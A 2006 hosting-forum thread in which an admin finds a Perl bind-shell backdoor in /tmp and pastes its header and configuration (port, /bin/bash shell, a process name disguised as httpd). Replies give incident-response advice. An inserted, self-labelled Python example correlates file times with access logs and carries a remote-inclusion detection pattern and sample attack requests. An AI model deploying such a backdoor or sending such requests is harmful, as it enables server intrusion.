
Hackers putting scripts in /tmp

Discussion in 'Plesk for Linux - 8.x and Older' started by cartoon, Jun 4, 2006.

  1. cartoon

    cartoon Guest

     
    I have seen that some processes are taking a lot of resources on one of my servers lately. Today I was looking at this and found two scripts in /tmp ( sem.perl and qmail.pl ). I am not sure what they do, but I can not find the scripts in any cgi-bin folder for any of the sites running on the server. I am running FreeBSD 5.3 with Plesk 7.5 and perl5.8.7. I have searched the complete server for files, including the e-mail addresses in the scripts, but can't find them anywhere other than in the /tmp folder.

    Can anyone point me in the right direction to find out how the scripts came onto the server?

    The script starts with the following (if anyone is interested in taking a closer look to find out what it does, I can post the complete script later):

    #!/usr/bin/perl
    # Telnet-like Standard Daemon 1.0
    #
    # Dark_Anjo - dark_anjo666@hotmail.com
    # - dark_anjo@nucleozero.com.br
    # - www.xn.rg3.net
    # - www.red.not.br/xn
    #
    # For those guys that still like to open ports
    # and use non-rooted boxes
    #
    # This has been developed to join in the TocToc
    # project code, now it's done and I'm distributing
    # this separated
    #
    # This one i made without IO::pty so it uses
    # only standard modules... enjoy it
    #
    # tested on linux boxes.. probably will work fine on others
    # any problem... #expl0its@irc.brasnet.org
    #

    ##########################################################
    # ******************* CONFIGURATION ******************** #
    ##########################################################
    my $PORT = $ARGV[0] || 3847; # default port is 54545
    my $PASS = ''; # encripted password
    my $SHELL = "/bin/bash"; # shell to be executed
    my $HOME = "/tmp"; # your HOME
    my $PROC = "/usr/local/apache/bin/httpd -DSSL"; # name of the process
    my $PASS_PROMPT = "Password: "; # password prompt
    my $WRONG_PASS = "Wrong password!"; # "wrong password" message
    my @STTY = ('sane', 'dec'); # stty arguments
    ##########################################################

    # feel free to change the ENV
    #### ENVironment ####
    $ENV{HOME} = $HOME;
    #$ENV{PS1} = '[\u@\h \W]: '; # the way i like :)
    # colorful PS1 is also funny :)
    $ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
    $ENV{MAIL} = '/var/mail/root';
     
  2. wagnerch

    wagnerch Guest

     
    One of your domains has a vulnerable web application. Try correlating the creation time or modification time (use "stat") of the files to the Apache access_logs. The events in the access logs may be a few seconds earlier than the creation/modification time of the files.

    Some very popular web applications are vulnerable to remote code inclusion/code execution vulnerabilities, like Mambo, phpBB2, phpAds, PostNuke, etc.

    You should also take a look at your mail queue, I am sure they were locally injecting spam into the queue. Use "qmail-qstat" to inspect the queue sizes (it is located in /var/qmail/bin on FC Linux, not sure where it is under FreeBSD).

    A preventative measure that you can take is installing modsecurity; it helps prevent some attacks but requires a lot of tuning and updating of rulesets.
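The correlation step the reply above describes (file mtime from "stat" against the domain's Apache access_log, looking a few seconds back), written out as an added example that is not from this thread or from Plesk. It parses Apache combined-format lines, keeps only the requests that arrived in a short window before the dropped file's mtime, and flags requests whose query string passes a URL as a parameter value, the shape of the remote-inclusion attempts mentioned above. The sample mtime, IP addresses and log lines are constructed; `correlate`, `requests_before` and the 60-second window are assumptions of this example.

```python
"""
Added example (not from the original thread): correlate a suspicious file's
mtime with Apache access-log requests that arrived shortly before it.
All timestamps, paths and log lines below are constructed.
"""
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" log line, e.g.
# 203.0.113.5 - - [04/Jun/2006:10:15:02 +0200] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# A query-string parameter whose value is itself a URL: the usual indicator of
# a remote file inclusion attempt against PHP applications.
RFI_RE = re.compile(r'[?&][A-Za-z_\[\]]+=(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("ts"), TS_FMT),
        "request": m.group("req"),
        "status": int(m.group("status")),
    }


def requests_before(lines, mtime, window_seconds=60):
    """Return parsed requests whose timestamp lies within window_seconds
    before mtime (the file's stat mtime, timezone-aware)."""
    start = mtime - timedelta(seconds=window_seconds)
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        if start <= entry["time"] <= mtime:
            entry["rfi_like"] = bool(RFI_RE.search(entry["request"]))
            hits.append(entry)
    return hits


def correlate(log_text, mtime, window_seconds=60):
    """Requests in the window before mtime, oldest first."""
    hits = requests_before(log_text.splitlines(), mtime, window_seconds)
    hits.sort(key=lambda e: e["time"])
    return hits


# Constructed sample: the dropped file's mtime and a few log lines around it.
SAMPLE_MTIME = datetime(2006, 6, 4, 10, 15, 30, tzinfo=timezone(timedelta(hours=2)))
SAMPLE_LOG = """\
198.51.100.7 - - [04/Jun/2006:09:58:11 +0200] "GET /forum/index.php HTTP/1.1" 200 8132 "-" "Mozilla/4.0"
203.0.113.5 - - [04/Jun/2006:10:15:02 +0200] "GET /cms/index.php?include=http://198.51.100.9/x.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [04/Jun/2006:10:15:04 +0200] "GET /cms/index.php?include=http://198.51.100.9/x.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [04/Jun/2006:10:15:20 +0200] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 9911 "-" "Mozilla/4.0"
198.51.100.7 - - [04/Jun/2006:10:31:00 +0200] "GET /forum/viewtopic.php?t=43 HTTP/1.1" 200 9950 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    import os
    import sys
    # Real use: python correlate.py /tmp/<dropped file> /path/to/access_log
    # (both paths are placeholders); otherwise the constructed sample runs.
    if len(sys.argv) == 3:
        mtime = datetime.fromtimestamp(os.stat(sys.argv[1]).st_mtime, tz=timezone.utc)
        with open(sys.argv[2]) as f:
            text = f.read()
    else:
        mtime, text = SAMPLE_MTIME, SAMPLE_LOG
    for e in correlate(text, mtime):
        flag = "RFI-like" if e["rfi_like"] else ""
        print(e["time"].isoformat(), e["ip"], e["status"], e["request"], flag)
```

On the sample, the two requests from 203.0.113.5 inside the window carry a URL-valued parameter and are flagged; the forum request in the same window is kept in the listing but not flagged, which is the point of the window: show everything that could have written the file, then let the query strings narrow it down. The window is deliberately wider than the "few seconds" mentioned above because clocks on the web server and the mtime can disagree.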
     
  3. cartoon

    cartoon Guest

     
    Thank you. The scripts have been there since the middle of April. I have closed the ports the scripts are using in the FW and am monitoring the server to try to catch them and see how the scripts are coming in next time. There was not a big mail queue now. On FreeBSD, use /usr/local/psa/qmail/bin/qmail-qstat to see the queue.
     